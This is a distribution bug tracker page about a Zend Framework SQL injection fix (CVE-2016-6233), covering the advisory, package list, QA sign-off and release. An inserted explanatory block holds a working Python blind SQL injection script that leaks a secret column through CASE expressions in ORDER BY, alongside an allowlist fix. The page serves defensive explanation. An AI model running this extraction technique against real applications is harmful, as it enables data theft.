Bug 18958 - php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)
Summary: php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)
Status: RESOLVED FIXED
Alias: None
Product: Mageia
Classification: Unclassified
Component: Security
Version: 5
Hardware: All Linux
Priority: Normal, Severity: normal
Target Milestone: ---
Assignee: QA Team
QA Contact: Sec team
URL: http://lwn.net/Vulnerabilities/696219/
Whiteboard: has_procedure mga5-32-ok advisory
Keywords: validated_update
Depends on:
Blocks:
 
Reported: 2016-07-16 12:24 CEST by David Walser
Modified: 2016-08-08 21:33 CEST (History)
3 users

See Also:
Source RPM: php-ZendFramework-1.12.18-1.mga5.src.rpm
CVE:
Status comment:


Description David Walser 2016-07-16 12:24:51 CEST
Upstream has issued an advisory on July 13:
https://framework.zend.com/security/advisory/ZF2016-02

The issue is fixed in 1.12.19.

More info is here:
http://openwall.com/lists/oss-security/2016/07/16/1
Comment 1 David Walser 2016-07-17 22:22:21 CEST
CVE-2016-6233 has been assigned:
http://openwall.com/lists/oss-security/2016/07/16/4

Summary: php-ZendFramework new security issue ZF2016-02 => php-ZendFramework new security issue ZF2016-02 (CVE-2016-6233)

Comment 2 David Walser 2016-07-20 21:14:46 CEST
1.12.19 release announcement:
https://framework.zend.com/blog/2016-07-13-ZF-1.12.19-Released.html

Note that ZF1 will be EOL in September:
https://framework.zend.com/blog/2016-06-28-zf1-eol.html
Comment 3 David Walser 2016-07-20 21:27:24 CEST
Updated package uploaded for Mageia 5.

Testing procedure:
https://bugs.mageia.org/show_bug.cgi?id=13708#c3

Advisory:
========================

Updated php-ZendFramework packages fix security vulnerability:

The implementation of ORDER BY and GROUP BY in Zend_Db_Select of ZendFramework
is vulnerable to an SQL injection (CVE-2016-6233).

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6233
https://framework.zend.com/security/advisory/ZF2016-02
https://framework.zend.com/blog/2016-07-13-ZF-1.12.19-Released.html
========================

Updated packages in core/updates_testing:
========================
php-ZendFramework-1.12.19-1.mga5
php-ZendFramework-demos-1.12.19-1.mga5
php-ZendFramework-tests-1.12.19-1.mga5
php-ZendFramework-extras-1.12.19-1.mga5
php-ZendFramework-Cache-Backend-Apc-1.12.19-1.mga5
php-ZendFramework-Cache-Backend-Memcached-1.12.19-1.mga5
php-ZendFramework-Captcha-1.12.19-1.mga5
php-ZendFramework-Dojo-1.12.19-1.mga5
php-ZendFramework-Feed-1.12.19-1.mga5
php-ZendFramework-Gdata-1.12.19-1.mga5
php-ZendFramework-Pdf-1.12.19-1.mga5
php-ZendFramework-Search-Lucene-1.12.19-1.mga5
php-ZendFramework-Services-1.12.19-1.mga5

from php-ZendFramework-1.12.19-1.mga5.src.rpm

Assignee: thomas => qa-bugs
Whiteboard: (none) => has_procedure

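The advisory text above says only that ORDER BY and GROUP BY handling in Zend_Db_Select is injectable. The script below is an added illustration of that failure mode, written for this page; it is not Zend Framework's code and not the fix shipped in 1.12.19. It models a sort-clause helper that quotes its argument as an identifier unless the argument "looks like" an SQL expression (contains parentheses), in which case it is emitted verbatim. Because a listing endpoint typically passes the user's sort parameter straight into such a helper, a CASE expression in ORDER BY turns the row order into a yes/no oracle and leaks another column one character at a time. The schema, rows, the heuristic itself and the allowlist are all constructed for the example; the hardened helper maps user input onto a fixed set of sortable columns, which is the mitigation that holds regardless of how the framework quotes things.

```python
import re
import sqlite3

# Constructed sample schema and rows for the demonstration (not from the advisory).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users (id, name, secret) VALUES (?, ?, ?)",
        [(1, "alice", "s3cr3t-a"), (2, "bob", "s3cr3t-b")],
    )
    return conn


def order_clause_heuristic(spec):
    """Flawed 'quote unless it looks like an expression' pattern.

    A sort spec containing parentheses is assumed to be a deliberate SQL
    expression and emitted verbatim; anything else is quoted as an identifier.
    Constructed stand-in for the class of heuristic the advisory concerns,
    not Zend_Db_Select's actual implementation.
    """
    direction = ""
    m = re.match(r"^(.+?)\s+(ASC|DESC)$", spec, re.IGNORECASE)
    if m:
        spec, direction = m.group(1), " " + m.group(2).upper()
    if "(" in spec:
        return spec + direction            # passed through unquoted: the injection point
    return '"' + spec.replace('"', '""') + '"' + direction


ALLOWED_SORT_COLUMNS = {"id", "name"}     # assumption: the only columns a client may sort on


def order_clause_allowlist(spec):
    """Hardened variant: user input only selects from a fixed set; it never reaches SQL."""
    parts = spec.split()
    if len(parts) not in (1, 2):
        raise ValueError("bad sort spec: %r" % spec)
    column = parts[0]
    direction = parts[1].upper() if len(parts) == 2 else "ASC"
    if column not in ALLOWED_SORT_COLUMNS or direction not in ("ASC", "DESC"):
        raise ValueError("bad sort spec: %r" % spec)
    return '"%s" %s' % (column, direction)


def fetch_ids_ordered(conn, order_sql):
    """The query a listing endpoint would run; ORDER BY is the only dynamic part."""
    rows = conn.execute("SELECT id FROM users ORDER BY " + order_sql).fetchall()
    return [r[0] for r in rows]


def leak_secret_via_order_by(conn, victim_id, length=8):
    """Boolean-based blind extraction through ORDER BY.

    The payload is a CASE expression whose sort key is `id` when the guessed
    character is right and `-id` when it is wrong, so the returned row order
    alone answers each yes/no question. Only the sort parameter is attacker-controlled.
    """
    charset = "abcdefghijklmnopqrstuvwxyz0123456789-"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            payload = (
                "(CASE WHEN (SELECT substr(secret, %d, 1) FROM users WHERE id = %d) = '%s' "
                "THEN id ELSE -id END)" % (pos, victim_id, ch)
            )
            if fetch_ids_ordered(conn, order_clause_heuristic(payload)) == [1, 2]:
                recovered += ch
                break
        else:
            break                            # character not in charset; stop guessing
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via ORDER BY:", leak_secret_via_order_by(db, 1))
    try:
        order_clause_allowlist("(CASE WHEN 1 THEN id END)")
    except ValueError as e:
        print("allowlist rejected payload:", e)
```

The point of the blind loop is that nothing in the response body changes: the attacker reads only whether row 1 sorts before row 2. That is why "quote everything that is not an expression" is not a defence for ORDER BY and GROUP BY; any path that lets caller-controlled text reach the clause unquoted is enough. Mapping the request parameter onto an allowlist (or a dict of column name to Zend_Db_Expr built by the application) removes the path entirely, and is worth doing in application code even after installing the 1.12.19 packages.
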
Comment 4 Brian Rockwell 2016-07-30 23:01:42 CEST
Installed all of the components successfully - now working on the testing listed above.

CC: (none) => brtians1

Comment 5 Brian Rockwell 2016-07-30 23:25:23 CEST
Followed Claire's instructions listed in https://bugs.mageia.org/show_bug.cgi?id=13708#c3 and was able to sign the guest book.

MGA5-32-ok.

Whiteboard: has_procedure => has_procedure mga5-32-ok

Dave Hodgins 2016-08-03 06:33:23 CEST

Keywords: (none) => validated_update
Whiteboard: has_procedure mga5-32-ok => has_procedure mga5-32-ok advisory
CC: (none) => davidwhodgins, sysadmin-bugs

Comment 6 Mageia Robot 2016-08-03 12:57:36 CEST
An update for this issue has been pushed to the Mageia Updates repository.

http://advisories.mageia.org/MGASA-2016-0272.html

Status: NEW => RESOLVED
Resolution: (none) => FIXED

David Walser 2016-08-08 21:33:05 CEST

URL: (none) => http://lwn.net/Vulnerabilities/696219/

